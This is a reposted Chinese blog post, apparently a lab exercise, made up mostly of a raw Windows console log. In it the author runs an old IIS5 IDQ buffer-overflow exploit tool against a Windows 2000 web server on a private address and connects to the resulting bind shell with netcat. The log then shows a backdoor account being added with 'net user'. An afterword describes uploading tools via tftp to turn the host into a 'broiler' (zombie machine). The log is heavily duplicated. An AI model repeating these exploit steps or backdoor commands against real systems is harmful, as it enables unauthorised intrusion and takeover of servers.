Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
(C) 版权所有 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator>d:
D:\>cd iisidq
D:\IISidq>dir
驱动器 D 中的卷没有标签。
卷的序列号是 C461-74A9
驱动器 D 中的卷没有标签。
卷的序列号是 C461-74A9
D:\IISidq 的目录
2011-05-03 08:46 <DIR> .
2011-05-03 08:46 <DIR> ..
2001-07-24 13:34 16,384 IISIDQOverflowV2_Build0013.exe
2001-07-24 13:34 24,576 IISMiscOverflowV2_Build0013.exe
2001-07-24 13:37 1,281 ReadmeNow.txt
2001-09-23 09:56 506 ReadmNow.txt
4 个文件 42,747 字节
2 个目录 8,274,116,608 可用字节
2011-05-03 08:46 <DIR> ..
2001-07-24 13:34 16,384 IISIDQOverflowV2_Build0013.exe
2001-07-24 13:34 24,576 IISMiscOverflowV2_Build0013.exe
2001-07-24 13:37 1,281 ReadmeNow.txt
2001-09-23 09:56 506 ReadmNow.txt
4 个文件 42,747 字节
2 个目录 8,274,116,608 可用字节
D:\IISidq>iisidq 0 192.168.191.128 80 1 521
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
D:\IISidq>iisidqoverflowv2_build0013.exe
运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>
或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>
运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>
或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>
其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe /c + dir"
如果为1,那么,将输入新的命令.
支持的操作系统 类型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --IIS5 Japanese Win2k Sp2
9 -- IIS5 Mexico Win2k
10 -- --IIS5 Mexico Win2k sp1
11 -- --IIS5 Mexico Win2k sp2
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --IIS5 Japanese Win2k Sp2
9 -- IIS5 Mexico Win2k
10 -- --IIS5 Mexico Win2k sp1
11 -- --IIS5 Mexico Win2k sp2
IIS5 IDQ Overflow.v2.0 Build 0013 by snake.
http://snake12.top263.net 2000/07
http://snake12.top263.net 2000/07
D:\IISidq>iisidq 0 192.168.191.128 80 1 521
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168.191.128 80 1 521
连接目的机器 192.168.191.128:80 OK.
发送shellcode 到 192.168.191.128:80 OK
现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [cmd.exe /c dir c:\] 结
果了...,good luck.!
D:\IISidq>cd..
连接目的机器 192.168.191.128:80 OK.
发送shellcode 到 192.168.191.128:80 OK
现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [cmd.exe /c dir c:\] 结
果了...,good luck.!
D:\IISidq>cd..
D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
驱动器 C 中的卷没有标签。
卷的序列号是 64FE-4AEE
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
驱动器 C 中的卷没有标签。
卷的序列号是 64FE-4AEE
c:\ 的目录
2010-09-14 10:35 <DIR> Documents and Settings
2010-09-14 10:29 <DIR> Inetpub
2011-05-03 08:29 <DIR> Program Files
2011-05-03 08:33 <DIR> web
2011-05-03 08:42 <DIR> WINDOWS
0 个文件 0 字节
5 个目录 6,867,349,504 可用字节
2010-09-14 10:29 <DIR> Inetpub
2011-05-03 08:29 <DIR> Program Files
2011-05-03 08:33 <DIR> web
2011-05-03 08:42 <DIR> WINDOWS
0 个文件 0 字节
5 个目录 6,867,349,504 可用字节
D:\>dir
驱动器 D 中的卷没有标签。
卷的序列号是 C461-74A9
D:\ 的目录
2011-04-09 00:27 1,107,800 8uftp.exe
2011-04-11 15:54 1,549 8uftp.xml
2011-04-14 16:23 <DIR> backup
2011-04-15 08:46 <DIR> data
2011-04-21 09:20 <DIR> fakeTasks.{D6277990-4C6A-11CF-8D87-00AA0060F
5BF}
2011-05-03 08:46 <DIR> IISidq
2011-04-21 08:37 1,120 maxiangrui.rar
1996-07-26 08:39 45,568 nc.exe
2011-04-14 16:46 <DIR> Program Files
2011-04-14 16:45 34,235,768 QQ2010.exe
2011-04-21 09:20 <DIR> set.{21EC2020-3AEA-1069-A2DD-08002B30309D}
2011-04-20 08:29 <DIR> sql
2011-03-27 10:32 <DIR> vfp
2011-03-30 09:39 <DIR> wy
2011-04-14 16:24 <DIR> _user
2009-12-31 00:00 7,981,995 客户端模拟练习版.exe
2011-04-12 08:21 <DIR> 聊天冲浪
6 个文件 43,373,800 字节
11 个目录 8,274,067,456 可用字节
2011-04-11 15:54 1,549 8uftp.xml
2011-04-14 16:23 <DIR> backup
2011-04-15 08:46 <DIR> data
2011-04-21 09:20 <DIR> fakeTasks.{D6277990-4C6A-11CF-8D87-00AA0060F
5BF}
2011-05-03 08:46 <DIR> IISidq
2011-04-21 08:37 1,120 maxiangrui.rar
1996-07-26 08:39 45,568 nc.exe
2011-04-14 16:46 <DIR> Program Files
2011-04-14 16:45 34,235,768 QQ2010.exe
2011-04-21 09:20 <DIR> set.{21EC2020-3AEA-1069-A2DD-08002B30309D}
2011-04-20 08:29 <DIR> sql
2011-03-27 10:32 <DIR> vfp
2011-03-30 09:39 <DIR> wy
2011-04-14 16:24 <DIR> _user
2009-12-31 00:00 7,981,995 客户端模拟练习版.exe
2011-04-12 08:21 <DIR> 聊天冲浪
6 个文件 43,373,800 字节
11 个目录 8,274,067,456 可用字节
D:\>cd iidisq
系统找不到指定的路径。
系统找不到指定的路径。
D:\>iisidq
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
D:\>cd iisidq
D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168191.128 80 1 521 1
请输入绑定的命令:cmd.exe
连接目的机器 192.168191.128:80 失败.
连接目的机器 192.168191.128:80 失败.
D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168.191.128 80 1 521 1
请输入绑定的命令:cmd.exe
连接目的机器 192.168.191.128:80 OK.
发送shellcode 到 192.168.191.128:80 OK
现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [cmd.exe] 结果了...,good
luck.!
D:\IISidq>nc -v 192.168.191.128 521
'nc' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
连接目的机器 192.168.191.128:80 OK.
发送shellcode 到 192.168.191.128:80 OK
现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [cmd.exe] 结果了...,good
luck.!
D:\IISidq>nc -v 192.168.191.128 521
'nc' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
D:\IISidq>cd..
D:\>nc -v 192.168.191.128
punt!: unknown socket error
punt!: unknown socket error
D:\>nc -v 192.168.191.128
no port[s] to connect to
no port[s] to connect to
D:\>
D:\>cd..
D:\>cd..
D:\>
D:\>
D:\>
D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
D:\>
D:\>
D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>
C:\WINDOWS\system32>net user maxr maxr123 /add
net user maxr maxr123 /add
命令成功完成。
C:\WINDOWS\system32>cd..
cd..
cd..
C:\WINDOWS>cd..
cd..
cd..
C:\>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 64FE-4AEE
dir
驱动器 C 中的卷没有标签。
卷的序列号是 64FE-4AEE
C:\ 的目录
2010-09-14 10:35 <DIR> Documents and Settings
2010-09-14 10:29 <DIR> Inetpub
2011-05-03 08:29 <DIR> Program Files
2011-05-03 08:33 <DIR> web
2011-05-03 08:42 <DIR> WINDOWS
0 个文件 0 字节
5 个目录 6,867,341,312 可用字节
2010-09-14 10:29 <DIR> Inetpub
2011-05-03 08:29 <DIR> Program Files
2011-05-03 08:33 <DIR> web
2011-05-03 08:42 <DIR> WINDOWS
0 个文件 0 字节
5 个目录 6,867,341,312 可用字节
C:\>cd web
cd web
cd web
后话:又看了一遍自己的实验过程,发现思路还是最重要的,最后获得了cmd .exe权限,基本上是什么都可以做了,开启tftp,上传***,一个肉鸡完成了,,,实验的结果不是最终目的,都是比较老的漏洞,现在的2000基本上退出市面了吧,最重要还是思路和方法。整个***过程的想法才是最宝贵的财富。
转载于:https://blog.51cto.com/xiangrui/558104
扫一扫
1048
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
